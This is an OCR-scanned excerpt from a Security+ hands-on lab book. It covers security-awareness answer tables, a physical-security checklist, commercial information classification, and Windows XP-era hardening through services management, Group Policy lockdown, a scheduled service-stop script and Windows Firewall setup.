Answers to Table 1.9 can be found in Table 1.10. Answers to the follow-up

TE question may vary but can include anything that keeps people focused on
security, such as mouse pads, coffee cups, T-shirts, pens, or other objects
that are used during the workday and printed with security slogans.

TABLE 1.10 Security Awareness, Training, and Education—Answers

Item Education Training Awareness
Trinkets printed with security slogans X
Newsletters X
Security+ certification X

Bachelor’s degree in computer security X

SANS 3-day seminar X

CASP certification X

T-shirts provided for good security practices X

1-day security seminar at the local college X

Quarterly security quiz with prize X

2-year associate’s degree in security X
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Criteria for Completion

You have completed this task when you have analyzed the items needed for a SETA
program and determined which are most useful for a user-awareness program.

Task 1.4: Reviewing
a Physical-Security Checklist

The value of physical security cannot be overstated. Physical security is also the oldest
aspect of security. Even in ancient times, physical security was a primary concern of those
who had assets to protect. Just consider the entire concept of castles, walls, and moats.
While primitive, these controls were clearly designed to delay attackers. Physical security

is a vital component of any overall security program. Without physical security you can
have no security at all. Any time someone can touch an asset, there is a good chance they
can control it. Usually, when you think of physical security, items such as locks, doors, and
guards come to mind, but physical security is also about employees. What can they bring
to work—iPods, USB thumb drives, camera phones? Even these items can pose a threat to
security. One good way to start building effective physical security is by creating a checklist
of items employees are allowed (or not allowed) to bring with them to work.

Scenario

Your organization may soon be subject to a security audit. Your manager would like to get
ahead of this process and have you investigate the current physical-security practices.

Scope of Task

Duration

This task should take about 20 minutes.

Setup

In real life security audits don’t happen in a void. They occur with the support and under
the direction of senior management. End users may or may not be informed ahead of time.
Either way, you would most likely have a memo or letter of authorization authorizing you
to perform such activities.

Caveat

Physical security is sometimes overlooked in the mostly logical world of IT. That practice
can have catastrophic consequences.
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Procedure

In this task, you will learn how to go through a physical-security checklist.

Equipment Used
For this task, you must have:

= A pen or pencil

Details

This task will step you through a physical-security checklist. It will highlight the value
of physical security. Physical security is different from the security controls focused on
hackers and crackers. Logical security addresses controls designed to prevent disclosure,
denial, or alteration of information. Both are important and, when combined, a holistic
view of security can be adopted.

Reviewing a Physical-Security Checklist

One of the best ways to check the physical security of your network infrastructure is to
conduct a physical-security review.

Use Table 1.11 to measure your company’s level of security. For each item that is present,
note a score of 1. If the control is not present, rate that item a 0.

TABLE 1.11 Physical-Security Checklist

Item Score (Yes =1, No = 0)

Is there perimeter security?

Is a security fence present?

Is exterior lighting used to deter intruders?

Is CCTV being used?

Are exterior doors secured?

Is access control in use at building entries?

Are dumpsters in an area the public can access?

Are sensitive items shredded or destroyed before being discarded?

Do interior areas have access control?
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TABLE 1.11 Physical-Security Checklist (continued)

Item Score (Yes=1,No =0)

Are the servers in a secure location?
Does the server room have protection on all six sides?
Is access to the server room controlled?

Are network cables and the telecommunication lines protected
from tapping, cutting, or damage from digging?

Are there “deadman” doors at each of the entrances to prevent
piggybacking?

Is old media degaussed, shredded, and destroyed?
Are confidential documents marked?
Is visitor access controlled?

Are uninterrupted power supplies, surge protectors, and
generators used?

Are visitor badges different from regular employee badges?

Are end users allowed uncontrolled access to USB ports or CD/
DVD burners?

TOTAL SCORE

After filling in Table 1.11, add up the score and compute the total:
= A score of 18 or higher is good.
= Ascore of 16 or 17 is fair.

= Ascore of 15 or below is poor.

)’ In real life, physical security takes much more work. This rating system
A&TE doesn’t take into account the issue of reliability or assurance, but should
give you an idea of the types of items you will want to examine.
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Criteria for Completion

You have completed this task when you have reviewed a physical-security checklist.

Task 1.5: Understanding the Value
of Documents

Identifying the value of the documents your company has is an important task. Documents
have value—some more than others. You might lose a quote from a vendor for the new
server you have requested and have little to worry about. But what if you lost a client list
that had credit card and other personal information? Clearly, some documents and the
information they contain are more valuable than others. Factors that impact organizations
and how they handle information include the following;:

s Government regulations such as the Health Insurance Portability and Accountability
Act (HIPAA) and the Gramm-Leach-Bliley Act hold corporations accountable for the
privacy, integrity, and security of information.

= Industry is more dependent than ever on the Internet. Many organizations use it for
critical and sensitive communications.

= Identity theft and loss of personal information is at an all-time reported high.

These issues are affecting businesses and placing an increased emphasis on how they handle
information.

Scenario

Your organization recently lost a laptop with sensitive company information on it. The data
on the drive was not encrypted. This incident has started a big debate at work on the value
of documentation and data. Your boss has asked you to investigate a system that could

be used to value documents and the information they hold. You will be asked to make
recommendations at the next staff meeting.

Scope of Task

Duration
This task should take about 15 minutes.

Setup

For this task you need a group of people from throughout the organization working with
you. While you may be an expert on I'T systems, you may not know the value of documents
or information in the HR department. Gathering data from different people in different
departments will provide better results.
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Caveat

Documents and data, whether in paper or electronic form, need adequate protection.
Sometimes this fact is grossly overlooked.

Procedure

In this task, you will learn how to categorize and place a value on documents and data.

Equipment Used
For this task, you must have:

= A pen or pencil

Details

This task will introduce you to some of the methods of information classification. You will
be required to take specific documents and determine which category they belong in. This
will allow you to specify the level of protection needed.

Information Classification

All companies must take steps to protect the integrity and confidentiality of their
information assets. An information-classification system is one way to do this. Information
classification helps identify sensitive information and can assist an organization in meeting
government regulations, such as HIPAA, and other regulatory requirements. Such a system
also helps prevent identity theft.

Two systems are primarily used to classify information:

s Governmental classification
s Commercial classification

This task will look at commercial classification, which is broken into the following
four categories:

Confidential This is the most sensitive rating. This is the information that keeps a
company competitive. This information is for internal use, and its release or alteration
could seriously affect or damage the corporation.

Private This category of restricted information is considered of a personal nature and
might include medical records or human-resource information.

Sensitive This information requires controls to prevent its release to unauthorized parties.
Damage could result from its loss of confidentiality or its loss of integrity.

Public Disclosure or release of information in this category would cause no damage to the
corporation.

Using the commercial classification categories, place the items in Table 1.12 into their
proper categories.

After completing Table 1.12, compare it to the results shown in Table 1.13.
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Item

Classification

Employee medical records

Trade secrets

Prototypes of next year’s products
Schedule of public events
Customer database

Pending sales events

Sales-call list

Monthly customer profit reports
Router configuration

Network diagrams and schematics

TABLE 1.13 Commercial Information Classification—Answers

Item

Classification

Employee medical records

Trade secrets

Prototypes of next year’s products
Schedule of public events
Customer database

Pending sales events

Sales-call list

Monthly customer profit reports
Router configuration

Network diagrams and schematics

Private

Confidential

Confidential

Public

Confidential

Sensitive

Sensitive

Confidential

Sensitive

Sensitive
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Did the answers agree with what you felt was the adequate level of protection? Were you
more conservative than the answers shown in Table 1.13? Although your answers may vary
from the chart, the goal is to see how certain documents, data, and information have more
value than others. Part of the job of a security professional is to determine that value and
work with management to develop adequate protection.

Computer security is not just about networks. It also encompasses
TE the technological and managerial procedures applied to protect the

confidentiality, integrity, and availability of information.

Criteria for Completion

You have completed this task when you have placed the various documents into their
proper categories.
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The objective of hardening a system is to reduce its attack
surface minimizing the opportunities for an attacker to perform
a successful exploit. Every system should be hardened to a
standard, baseline level of security. The servers holding your most sensitive information
assets and services should be hardened to a higher level.

In addition to implementing security controls, such as having and enforcing a security
policy, physically securing your sensitive servers, providing regular user security-awareness
training, implementing a strong password policy, and implementing security following
the principle of least privilege, the hardening of systems should include configurations and
controls such as the following;:

= Disable and lock down unnecessary services

= Close all unnecessary ports

= Implement a standard operating system (OS)-— and application-patching routine
= Implement security controls on the OSs, the users, and the network

= Manage the launching of applications

= Implement antivirus filtering and updates of virus definitions

= Implement antispyware filtering and updates of spyware definitions

In addition to the tools presented here, many tools are available to help you, the security
administrator, perform tasks related to analyzing, understanding, and hardening your
systems. Websites with several handy tools include the following:

= Gibson Research Corporation (www.grc.com/default.htm)
s GFI Software (www.gfi.com/)
= Sysinternals (www.sysinternals.com/)

Microsoft’s Windows Defender application and its newer version named Windows
Security Essentials, found at www.microsoft.com/security/products/mse.aspx, provide
a wealth of system information as well.

The tasks in this phase map to Domains 1, 3, and 6 in the objectives for the CompTTA
Security+ exam (www.comptia.org/certifications/Tisted/security.aspx).
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Task 2.1: Managing Services

Several attack vectors are aimed at exploiting system services. Services are applications and
processes that run at system startup. These services perform many beneficial tasks, such as
the Server service (File And Printer Sharing) or the World Wide Web Publishing service,
required to run a web server.

Services open doorways, or ports, into a system. It is through these open ports that an
attacker can attempt to penetrate your system with known, potential exploits.

Another attack vector on services is aimed at privilege escalation. All processes,
including services, must run under the context of a user account. These services have
an associated user account that is granted rights and permissions (known as privileges)
sufficient to perform the work that the service is designed to accomplish. These user
accounts are automatically “logged on” during system startup so that the services can be
started, even without any human user logging onto the system.

Many services run under the context of the System account, a built-in user account that is
granted quite a bit of privilege. During installation, many applications build a service account
and grant that user account appropriate privileges to do the work of that application.

If an attacker can execute a successful exploit against a service, the attacker will then have
access to the system at the privilege level of the user account running the service that was
exploited. If this is the System account, the attacker will have quite a bit of system access and
can strengthen his hold on your system. This is referred to as escalation of privilege.

For these reasons, any and all services that are not essential for the operation and
performance of a system should be disabled, stopped, and locked down by Group Policies.
A diligent administrator may even schedule a task to regularly kill these services, just in
case an attacker has been able to get one running.

Further, service accounts for applications should be granted only the minimum level
of privilege required to perform the work of the application, following the principle of least
privilege. It is usually a mistake to run services under the context of the Administrator
account. This account almost always has too many privileges, more than are required to
perform the work of the application.

The decision on what services to have started or stopped will vary greatly and will
depend on the specific requirements of the individual system being configured.

Scenario

You are configuring a new system to be used as a file and print server that will hold
sensitive data. You must reduce the attack surface of the system by disabling unnecessary
services and ensuring that they cannot be started inappropriately.

Scope of Task

Duration

This task should take about 90 minutes.
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Setup

For this task, you will need a Windows workstation or server. Both the workstation and
server versions of the Windows operating system have a Server service and may be used for
file and printer sharing.

Workstation-class operating systems allow for a maximum of 10 inbound

TE connections to the Server service. In the corporate environment, this is
usually considered insufficient and therefore a server-class operating
system is preferred to provide file- and printer-sharing services.

Caveat

While you want to stop any and all unnecessary services, services are created to provide
good benefit to users. Disabling services will reduce the utility of a system and many
potentially desirable features of a system will no longer function. It may not be immediately
obvious what features will stop working as you disable a given service. Services have
relationships (known as dependencies) to other services. As you look at the properties
of a service, you may discover that other services are required to run this service, and
that other services may require this service to be running.

You must proceed cautiously and test the system to ensure the desirable features are still
functional while stopping as many nonessential services as you can.

Procedure

In this task, you will disable services that aren’t required for the given functional
requirements of a system. You will minimize privilege levels and implement controls to
keep nonessential services disabled.

Equipment Used
For this task, you must have:
= A Windows XP or Windows Server—class system

s A Local Administrator account

If you have access to an Active Directory environment and a Domain
ITE Administrator account, the task can be completed within Group Policy
Objects (GPOs).

Details

The following sections guide you through identifying any dependencies related to a given
service, both upstream and downstream. Next you will examine how to disable and stop
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a service. You will then identify which service account is being used for each service and
consider how you might change this account to follow the principle of least privilege.

In an Active Directory environment, you can implement a GPO to further lock down a
service. These GPOs refresh on a regular basis and will maintain control over the service
continuously.
Finally, you will write a batch file to disable a service and schedule it to run every 4
hours, in case an attacker has been able to reconfigure a disabled service to run.

Using the Computer Management Tool

1.

After logging on as a Local Administrator, launch the Computer Management tool.

For Category View: From the Start menu, select Control Panel » Performance And

Maintenance » Administrative Tools » Computer Management.

For Classic View: From the Start menu, select Control Panel » Administrative Tools >
Computer Management.

Expand Services And Applications.

Select Services and maximize the window. Click the Standard tab.

ol
=) File Action  View ‘Window  Help |;|g|5|
<3=-b\\|@\>llll>
Computer Management (Local) Mame _/ | Description | Status | Starkup Type | Log On As | =1
1§, System Tools S8 NET Runtime Optimization Service w2.0.... Microsoft NET Framework NGEN Manual Local System
(g Event Viewer %Adaptwe Server Anywhere - WavelinkHPM Disabled Lacal System
% Shared Folders Alerter Notifies selected users and computers o... Disabled Local Service |
B Local Users and Groups %Apphcat\on Layer Gateway Service Provides support For 3rd party protocal ... Manual Laocal Service
Performance Logs and Alerts _
g Device Manager %Apphcat\on Management Provides software installation services s... Manual Lacal System
B & Storage %ASP.NET State Service Provides support For out-of-process ses... Manual Metwork 5.
- Remavable Storage %Automat\c Updates Enables the download and installation o...  Started Aukomatic Lacal System
Disk Defragmenter %Eackground Inteligent Transfer Service Transfers files in the background using ... Started Manual Lacal System
g Disk Management %Chpﬁouk Enables ClipBook Wiewer to store inform. .. Disabled Local System
- Seri d Applications COM+ Event System Supports System Event Motffication Ser...  Started  Manual Local System
83 COM-+ System Application Manages the configuration and tracking. .. Manual Local System
% WML Control 8 Computer Browser Maintains an updated list of computers .., Automatic Local System
BB Indexing Service 983 Creative Service For COROM Access Started  Automatic Local System
8 Cryprographic Services Pravides three management services: C...  Started Automatic Local System
%DCOM Server Process Launcher Provides launch functionality for DCOM ... Started Automatic Local System
SEDefwatch Started  Automatic Local System
S DHCP Client Manages network configuration by regis...  Started  Automatic Local System
%D\stnhuted Link Tracking Client Maintains links betwesn NTFS files withi...  Started Automatic Local System
8 Distribured Transartinn Coordinator Conrrdinates transartions Hhat snan molt.. Maru al Metwerk 5. =)
el |*| % Extended p, Standard /
\

The services are listed in alphabetical order by default. You can click on the column
title to re-sort ascending/descending by any column. Sorting lets you view what services are
running, set services to start automatically, and identify the user account a service is running
under. Click on the column title to sort by Startup Type to see which services are set to start
automatically at system startup.
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You can also build a Services Microsoft Management Console (MMC) by

ITE adding the Services snap-in. To do so, click Start » Run and type MMC.
Then click OK. In the Console Root window, select File » Add/Remove
Snap-in and click the Add button. Then select Services from the snap-in
list and click Add. Click Finish. Click Close and then click OK.

If you have Administrative Tools installed, the Services MMC is also
JTE available by clicking Start » Programs » Administrative Tools > Services.

Examining Dependencies Between Services

1. In the Computer Management window, double-click the Logical Disk Manager service,
and select the Dependencies tab.

% This tab may take a few moments to populate.
TE

2. Observe the two fields: This Service Depends On The Following System Components
and The Following System Components Depend On This Service.

Logical Disk Manager Properties 21|

General | Log On | Recoveny [Diependencies |

Some services depend on ather services system drivers and load order
groups. IF & system component is stopped or is not running properly.
dependent services can be affected

Logical Disk Manager

Thiz zervice depends on the following system components

The following system components depend on this service
% Logical Disk Manager Administrative Service

oK I Cancel | Apply |

It is the components in the field The Following System Components Depend On This
Service that you need to be most concerned about when disabling a service. Any
services listed in this field will fail to start if you disable the selected service.
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3. Select additional services to get a feel for their dependencies.

4. Close all service property pages.

Disabling and Stopping Services

1. In the Computer Management tool’s Services window, double-click on the Windows
Time service. The Windows Time service is used to synchronize the system clock with

the system clock on its authentication server.

7/
ING

2. Select the Dependencies tab.

2

You must reset this service to its default configuration—Automatic and
Started—at the completion of this task.

This tab may take a few moments to populate.

3. Observe the lower field: The Following System Components Depend On This Service.
Notice that, by default, no services depend on this service. Be aware that on other
services, if this field is populated the dependent service will fail as you complete this task.

4. On the General tab, select the Startup Type drop-down. Notice that the Startup Type
options are Automatic, Manual, and Disabled. Automatic starts at system startup;
Manual starts this service if another service or application starts that depends on this
service; and Disabled means that this service will be prohibited from starting.

Windows Time Properties {Local C

General |Lug Dnl Hecover}l' Dapendancies'

2

Service name: W32Time
Display riame: [W'imdnws Tirne
Description Maintains date and time synchronization on all clients = |

and servers in the network. If this service is stopped, =l

Path to executable:
|E'\W\NDD\N"5 YSystem32isvchost exe -k netsves

Startup tepe: IAulomatic d
Manual
Dizabled
Service status: T
Start | Stop | Fauze | Fesume: |

‘r'ou can specify the stark parameters that apply when pou start the service
fram here.

Start parameters: I

ak. I Cancel Apply
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5. Set Startup Type to Disabled. Click Apply.
Notice that the Service status is still Started. Disabling a service does not
TE stop the service if it has been started. You must stop the service manually.
6. Click Stop to shut down the service. You will see a progress bar as the service is being
stopped.
Confirm that the service status is now stopped.
You have now successfully disabled and stopped a service.
For proper system operation, you must reset this service to its default
TE configuration: Automatic and Started.
9. Set Startup Type to Automatic. Click Apply.
10. Click Start. You will see a progress bar as the service is being started. Confirm that
Startup Type is Automatic and Service Status is Started.
11. Click OK to close the property pages for the Windows Time service.

Identifying the Service Account Used to Start a Service

1.

With the Computer Management tool open, click on the Log On As column to sort its
contents.

Scroll down this list and notice the various user accounts used to start each service.
Most services run under the context of the Local Service, Local System, or the
Network Service account. If your system has an application installed that requires

a service account, you will see those accounts listed as well. Whatever account is
utilized, it should have just the bare minimum level of privilege to perform the work
of the application, process, or service. If you see the Administrator account listed here,
this privilege level is probably too high and should be changed to an account of lesser
but sufficient privilege.

As a demonstration of how to change the service Log On As account, you will use the
ClipBook service.

@:" At the end of this task, you will reset the service account to the default

ING Local System account. Failure to reset the Log On As account may cause
desirable services to fail.

Double-click the ClipBook service. Select the Log On tab. Notice that this service
defaults to the Local System account.



4. Select This Account, and then click Browse.

ClipBook Properties {(Local Computer

General Log On | Hecnveryl Depandenciesl
Log on as:

" Local Svstem account
= Allovi service bajinteract with deskiop
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@ This account

Pasgword:

Confirm pazsword:

“f'ou can enable or disable this service for the hardware prafiles listed belaw:

Hardware Profile

‘ Service |

Profile: 1

Erable | Dizable |

Enabled

ok |

Cancel | Apply |

5. Click Advanced.

6. Click Find Now and highlight the Administrator account.

Select thiz object ype:

2lx|

IUSEI of Built-in security principal

Framm this lacatiorn:

Obiject Types.

ISHDTGUN

Common Jueries |

Lacations...

Hame: IStarlswwthd I

Colurifis,.. |

D escription IStarlswwthj I

™ Disabled accaunts
™| Nor expiting password

[Days since last logomn: I vl

Find Mow |
Stop |

Hame [RDM) | InFolder |

SHOTGUN

TIETE:

€ ASPNET SHOTGLN
€ dmiller SHOTGUN
6 Guest SHOTGUN
5 Helpdssistart. SHOTGLN
€5 LOCAL SERY .
CTNETWORK S ..

% SUPPORT_3.. SHOTGUN
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Click OK twice, which selects the Administrator account as the account to be Logged
On As for this service.

7. In the ClipBook Properties dialog box, select the Log On tab, type the Administrator’s
password in the Password field, and then retype it in the Confirm Password field. Click
Apply to complete the process.

ClipBook Properties (Local Computer) e |
General LogOn |Rscovely[ Depsndancias]

Log on as:

"~ Local System acoount

I™ Allow service ba interact with deskiop

" Thig account: IW Browse...
Pa@swl][d; I...............
Confim d: I

“f'ou can enable or disable this service for the hardware profiles listed below:

Hardware Profile | Service ‘
Profile 1 Ensbled
Erctle | Disable |

| oK I Cancel | Apply |

Be aware that if this account password is changed—and it should be

TE changed regularly—you must change the password in this dialog box as
well. If you do not keep this dialog box synchronized with the account
password, the service will fail to start.

You have now successfully changed the Log On As service account for a service.

For proper system operation of the ClipBook service, you must reset this
TE service to its default configuration, Local System.
8. Set the Log On As option to the Local System account. Confirm that the Allow Service
To Interact With Desktop check box is cleared. Click Apply.

©

Confirm that the Local System account is selected.

10. Click OK to close the property pages for the ClipBook service.
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Locking Down Services with Group Policy Objects

Computer GPOs are applied at system startup and are refreshed by default every
90-120 minutes on member servers and workstations, and every 5 minutes on domain
controllers.

This task requires access to an Active Directory (AD) environment and

TE you must have Domain Administrator privileges. If you do not have these
components, you cannot complete this task. In a well-developed AD
environment, you may need to build a security group with administrators
that you want to be able to manage system services. In this task, you

will be granting only this elite group of administrators the privilege of
managing system services on your hardened servers.

1. After logging on as a Domain Administrator on either a domain controller or on
a Windows XP system with Adminpak.ms1i installed, select Start » Programs »
Administrative Tools, and launch Active Directory Users And Computers (ADUC).

2. Expand the domain object. Select and right-click on the Users OU. Select New >
Group.

3. Name the group Service Admins. Confirm that Group Scope is set to Global and that
Group Type is set to Security. Click OK to create the security group. This group will
now be populated with the elite group of domain administrators that you wish to allow
to configure services.

New Dbject - Group x|

@ Create in:  mobeer.comfUsers

Group name:

I Service Admins|

Group name {pre-Windows 2000);
I Service Admins

Groupscope | [ Group kype
" Domain local & Security
= Global " Distribution
" Universal
oK I Cancel |

4. In ADUC, select the domain name. Then right-click on the domain name and select
New » Organizational Unit.
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4% Active ctory Users and Computers - |E| ﬂ
<9 Fle  pction  visw  Window  Help |_ = |
7 [P -~
o | AE R ERB R aifavED
@ Active Directory Users and Computer | mobeer.com 10 objects
% Saved Queries Name ¢ | Type | Description
B- e builtinDarnain
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g BCU"U F_dg Container Default container For upgraded comput,..
: ind. .,
) tollers rganizational ... Default conkainer for domain controllers
@DD“" e tral o tional ... Default container For d tral
om. onnect ko Domain, .
Clfere o 5 5 Contral ribyPrincipals Container Default container For security identifier,..
onnect ko Domain Contraller,..,
. re infrastructurel...
([ Losts  Raise Domain Functional Level... . .
d nd lostAndFound Default container for arphaned objects
[ NTD Operations Masters. .
— Bs msDS-QuotaCo,.,  Quota specifications container
Computer Default location For storage of applicati,..
- User Al Tasks 3 Contact Builtin system settings
a } Group Default container for upgraded user ac,..
ek InetOrgPerson

Mew Window from Here

MSMQ Queue Alias

Refresh Crganizational Unit
Export List... Printer

User
Properties Shared Folder
Help

Name the new organizational unit (OU) Hardened Servers. Click OK. Place into this
OU the computer account objects for all servers you are attempting to harden with

these GPOs.

Right-click on the Hardened Servers OU and select Properties. Select the Group

Policy tab.

Click New and rename the new GPO Services Lockdown.

Click Edit.

(=10 mobeer.cam
(1 Buitin
(L Computers
{5 Domain Controllers

(21 LostAndFound
(L NTDS Quatas
(22 Program Data
(23 swstem

([ Users

--{£7] Hardened Servers

(21 ForeignSecurityPrincipals

Hardened Servers Properties

There are no items to show in this vie

d

General | Managed By | Dbiect | Secuty | COM+ Group Policy |

Toimprove Group Policy management, upgrade to the Group Policy
M anagement Console (GPMC),

O
Current Group Policy Dbject Links for Hardened Servers
e

Giroup Policy Dbject Links
Services Lockdown

| Mo Overide | Disabled |

Group Policy Objects higher in the list have the highest priority.

. This st obtained from: rio.mobeer com
Bew | ag. | Eat | U
Optiors.. |  Delete. | Propeities | Down |
I Black Policy inheritance
e I
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9. Inside the new Services Lockdown GPO, in the left pane expand Computer

Configuration » Windows Settings » Security Settings. Select System Services.

I=E
Eile  Action View Help
RS IEE
_='j' Services Lockdown [rio.mobeer, com] Policy Service Mame /. | Startup | Permission | -
@ Computer Configuration JMET Rurtime Optimization Service ... Mok Defined Mot Defined
[ Saftware Settings &, plerter Mot Defined Mot Defined
=) D Windaws Settings %Applicatiun Expetience Lookup Ser... Mot Defined Mot Defined
Seripts {Startup/Shutdavin %Applicatiun Layer Gateway Service Mot Defined Mot Defined
B Security Setting.s. %Applicatiun Management Mot Defined Mot Defined
Account Policies &, 5P HET State Service Mot Defined Mot Defined
Ié::::&h;es %Automatic Updates Mok Defined Mot Defined |
8 Restricted Groups %Background Inteligent Transfer Se... Mok Defined Mat Defined
8 B %ClipBuok Mok Defined Mot Defined
@ regstry %COI‘*‘H Event System Mok Defined Mot Defined
(& File System %COI‘*‘H System Application Mot Defined Mat Defined
Wireless Metwork (IEEE 802,11} Policies & Computer Erawser Mot Defined  Mat Defined
-1 Public Key Palicies %Cryptagraph\c Services Mok Defined Mot Defined
(271 Software Restriction Policies [eZOM Server Process Launcher Mot Defined Mot Defined
@ 1P Security Policies on Active Directory (mobeer.c %DefWatch Mot Defined Mat Defined
£ Administrative Templates %DHCP Clienk Mot Defined Mot Defined
1 User Configuration & DHCP Server Mot Defined Mot Defined
[ Saftware Settings %Distributad File System Mot Defined Mot Defined
(0 windows Settings &, Distributed Link Tracking Client Mot Defined Mot Defined
(3 Administrative Templates &, Distributed Link Tracking Server Mot Defined Mot Defined
e&Distributad Transaction Coordinator Mot Defined Mot Defined
e&DNS Client; Mok Defined Mot Defined
e&DNS Server Mok Defined Mot Defined
e&Ermr Reparting Service Mot Defined Mat Defined
Ewent Log Mot Defined Mat Defined
J | @l e o

10. In the right pane, double-click the ClipBook service.

11. Select Define This Policy Setting, and then select Disabled. This configures the

ClipBook service to Disabled during system startup.

ClipBook Properties

Security Palicy Setting |

ClipBook

¥ Define this policy setting

Select service startup mode,

" Automatic
= Manual
= Digabled

Edit Security.

21x

Ok Cancel Apply
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12. Click Edit Security. You must first add your elite group of administrators—the Service
Admins global group—and then remove the administrators from the access control list
(ACL). To do so, first click Add.

13. In the resulting dialog box, click Advanced, then click Find Now and select the Service
Admins global group.

14. Click OK twice. This adds the Service Admins global group to the Security For
ClipBook ACL. Confirm that all Allow permissions are selected, except Special
Permissions.

15. Select the Administrators Group in the Group Or User Names field. Click Remove.

Security for ClipBook 21|
Security I

Group of Lger names:
€5 INTERACTIVE

, Service Admins [MOBEER\Service Admins)
€ 5YSTEM
Agdd | Bemove |
Permissions for Service Adming Allow Deny
Full Contrel a
Read 4 O
Start, stop and pause O
Write O
Delete O
Special Permissions D D

For special peimissions or for advanced settings,
click Advanced. _ dganced|

oK I Cancel | Epply |

16. Click OK to close the Security For ClipBook dialog box. Click OK in the ClipBook
Properties dialog box.

17. Close the GPO.
You have now successfully created a GPO that will, at startup, reset the ClipBook
service on all computers in the Hardened Servers OU to Disabled, and only the members

of the Service Admins security group have the privilege to make any changes to the Startup
Type and Service Status values for this service.

You have configured only one service: ClipBook. If you were hardening
TE a system, you would configure this GPO with additional service settings

defined for all services you wish to control.
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Resetting Services with Task Scheduled Scripts

1. In Windows Explorer, create a new folder called Scripts in the root of C:

2. Open the Scripts folder. In the right-hand pane, right-click the white space in the
Scripts folder and select New » Text Document.

3. Rename the text document StopAlerter.cmd. Notice that there are no spaces in the
filename. You will be prompted with a warning about changing the file’s extension.
Click Yes to accept the filename with the new extension.

4. Right-click StopAlerter.cmd and select Edit. If prompted, select Notepad as the
application used to open this document.

5. In the Notepad application, type the command net stop alerter, and then press Enter.

To determine the name of the services on a system, launch Regedit

TE (Start » Run, type Regedit, and click OK). In the Registry Editor
application, expand the Registry to HKEY_LOCALMACHINE > SYSTEM >
CURRENTCONTROLSET > SERVICES. The folder names in this folder are
(usually) the correct service names to use with the NET STOP command.
Test these at a command prompt to be certain. Another option for locating
service names is to boot into Recovery Console and type the command
LISTSVC. Then scroll through the services available on the system to
identify the service name.

6. Select File » Save, and then close Notepad.

In the Control Panel (Start > Settings » Control Panel), select Scheduled Tasks > Add
Scheduled Task.

8. Build a scheduled task to run the StopAlerter script every 4 hours. When the Task
Scheduler Wizard launches, click Next.

9. Browse to C:\Scripts\StopAlerter.cmd. Click Next.

10. Schedule the task to run daily. (You’ll fix this later.) Click Next.

11. Set the start time to 9:00 a.m. every day and set the start day to tomorrow’s date.
Click Next.

12. Enter the credentials (username and password, which you enter twice) of the local
administrator, the domain administrator, or, in the case of a service controlled by
the Services Lockdown GPO, the credentials of a member of the Service Admins
security group (someone with a privilege level sufficient to configure the service).
Click Next.

13. Select Open Advanced Properties and click Finish.

14. In the dialog box for the StopAlerter task, select the Schedule tab.
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Task  Schedule | Sattings | Secuiy |

ﬁ Every 4 hourls) from 4:06 PM for 24 haurls) every day, starting
B/21/2010

Schedule Task: Start time:

IDa\Iy j I 4:06 PM :‘ Advanced..

"Schadula Task Dail

Every IW _|::l dayls]

™ Show multiple schedules.

1] | Cancel | Apply |

15. Click Advanced, and then select the option to repeat the task every 4 hours and set the
duration to 24 hours.

advanced Schedule Options 2=l
Start Date: | Monday a.20m &

[~ End Date: I d
v Repeat task

Eveny |4 _% Ihours -
Untit: € Time: I =
" Duration: |2=1 _lj haours] |0 _Ij minute(s]

™ It the task is stil running. stop it at this time.

Cancel

16. Click OK twice.

You have now scheduled the StopAlerter task to run every 4 hours, every day. If an
attacker managed to get this service to start, this task would stop the service when it runs.
This means that the attacker would have to break into your system every 4 hours and

restart this service (assuming he could accomplish such a feat!), essentially starting over
with his devious activities.

7/

You should carefully consider resetting all changes that you’ve made to
ING

their original default configuration.You have stopped and disabled services.
You have locked down services, perhaps to a point where desirable system
operations may fail. You have scheduled a task that stops a service to run
every 4 hours, forever. Evaluate the changes you've made and determine
whether you should undo these changes before you proceed.
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Criteria for Completion

You have completed this task when you know how to determine a service’s dependencies,
how to disable and stop services, how to set the service account to a user account with the
minimum level of privilege to run the service, how to lock down the services by GPO, and
how to regularly stop services in case they do somehow get started.

Task 2.2: Managing Ports

Ports represent services available on a system, such as File And Printer Sharing, Domain
Name System (DNS), and Windows Internet Name Service (WINS). These services provide
a good benefit to clients and the network infrastructure as a whole. Ports are also the path
into the system for an attacker. To harden a system against attackers, you want to close all
ports except those that are required to provide the desired services on a system.

Task 2.1 covered how to manage services. You learned how to view which services
are running, how to disable and stop those services, how to lock down the services by
managing who can make changes to the services, and how to continuously stop unwanted
services from running. This is a big first step in managing ports.

The next step in managing ports is to install, enable, and configure the firewall service
on your systems.

Scenario

You are configuring a new system to be used as a workstation with limited file and print
sharing and a personal website. You must reduce the attack surface of the system by
implementing Windows Firewall and configuring it correctly to close unnecessary ports.

Scope of Task

Duration

This task should take about 60 minutes.

Setup

For this task you will need a Windows XP workstation with Service Pack 2 (SP2).

Windows Firewall was provided in Windows Server 2003 SP1 and
A TE in Windows XP SP2. Workstation-class operating systems allow for a

maximum of 10 inbound connections to the server service.
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To perform testing of open ports using a port scanner, you will need a second
Windows XP system. You will need to make sure the following application is installed on
this system:

= Nmap port scanner (Windows binaries). The latest version as of this writing is nmap-
5.50-setup.exe. Available at http://nmap.org/download.html.

Caveat

Although you want to close any unnecessary ports, ports are opened to provide a benefit to
users. Enabling Windows Firewall and closing ports will reduce the utility of a system, and
many potentially desirable features of a system will no longer function.

You must proceed cautiously and test the system to ensure the desirable features are still
functional while making sure that you’ve closed as many ports as you can.

Procedure

You will implement Windows Firewall and close ports that aren’t required for the given
functional requirements of a system. You will then test the system, both internally and
externally, and confirm that you’ve achieved the desired results.

Equipment Used
For this task, you must have:

= A Windows XP SP2 system with Internet Information Services (IIS) web services
installed and started

= A Local Administrator account
= Nmap port scanner for Windows

= A second Windows XP SP2 system with the Nmap port scanner for Windows
installed

Details

The following sections guide you through the configuration of Windows Firewall. This
firewall closes all inbound ports except those you allow. You will configure the firewall
to allow file and printer sharing (ports 137, 138, 139, and 445) and HTTP (port 80) for
the personal web server. Then you will test the system to identify ports that the system
is utilizing and the applications associated with the open ports. You will then use a port
scanner (Nmap) to interrogate the system from an external vantage point.

Configuring Windows Firewall on XP SP2

1.  On the Windows XP SP2 system, right-click on My Network Places and select
Properties. If there is no icon on the desktop, you can go to the Control Panel and
launch Network Connections.
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=100

Advanced  Help

&

QEack - O - l.l: |\/,:) Search || Folders ‘|$ (¥ x q ‘ -

Address Ie_ NMetwork Connections

B

Wizard

HNew Connection Wizard

<

\wizard

Mame | Tvpe | Status | Device Mame | Phane # or Host Address I Cwner
Internet Gateway
&3 1nternet Cannection Internet Gateway Connected Internet Connection System
LAN or High-Speed Internet
